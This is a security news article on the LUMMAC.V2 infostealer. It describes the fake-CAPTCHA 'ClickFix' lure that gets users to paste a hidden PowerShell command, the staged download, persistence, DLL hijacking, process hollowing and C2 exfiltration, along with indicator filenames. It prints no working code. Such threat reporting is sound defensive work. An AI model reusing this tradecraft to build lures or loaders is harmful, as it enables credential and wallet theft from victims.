LUMMAC.V2 Stealer Uses ClickFix Technique to Deceive Users into Executing Malicious Commands

The LUMMAC.V2 infostealer malware, also known as Lumma or Lummastealer, has emerged as a significant threat, employing the cunning “ClickFix” social engineering technique to compromise unsuspecting users.

This malware, rewritten from C to C++ with an advanced binary morpher, targets a broad spectrum of sensitive data, including credentials, emails, personal details, screenshots, and cookies from browsers, crypto wallets, password managers, and more.

Distributed through deceptive means, LUMMAC.V2 tricks users into executing malicious commands by presenting fake CAPTCHA verification pages that prompt them to open the Windows Run dialog box, paste a pre-copied command, and execute it.

This initiates a hidden PowerShell payload, setting off a complex infection chain that can devastate personal and system security.

Multi-Stage Infection Chain and Stealthy Execution

The infection typically begins with seemingly innocent internet searches for cracked software, movies, or music, where malicious links redirect users to fraudulent CAPTCHA pages.

Once the user follows the deceptive instructions, a PowerShell command downloads a malicious script from a remote server, often hidden from view with the -W Hidden parameter.

According to Google Report, this script, such as the one fetching a file named pnk3.txt, orchestrates the download of a ZIP archive containing the malware, extracts it to the user’s AppData folder, and executes a disguised executable like Perspective.exe.

For persistence, LUMMAC.V2 adds registry entries to ensure it runs on system startup.

The malware employs varied delivery mechanisms, including DLL hijacking, where a legitimate program loads a malicious DLL like tak_deco_lib.dll, process hollowing to inject code into trusted processes such as BitlockerToGo.exe, and AutoIt-based droppers that use obfuscated scripts to evade detection.

These techniques highlight the malware’s sophistication, as it masks its activities within legitimate processes and employs anti-analysis checks to thwart security tools.

Data Exfiltration and Robust C2 Communication

Once deployed, LUMMAC.V2 establishes communication with its command-and-control (C2) servers through persistent DNS queries and TLS v1.2 connections, often masked by Cloudflare’s reverse proxy services to obscure the true server locations.

After confirming server availability with a heartbeat signal (act=life), it retrieves obfuscated configuration data encrypted with Base64 and XOR techniques, later staging sensitive information like cryptocurrency wallet data and browser files for exfiltration via HTTP POST requests.

The malware’s ability to request additional payloads or instructions underscores its adaptability and the ongoing risk it poses post-infection.

Targeting an extensive list of applications and personal files, LUMMAC.V2 exemplifies the escalating danger of infostealer malware in today’s digital landscape, urging users to exercise caution with online interactions and maintain robust security defenses against such stealthy threats.

As cybercriminals refine their tactics, awareness and proactive measures remain critical to countering the insidious reach of threats like LUMMAC.V2, which exploit human curiosity and trust to devastating effect.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!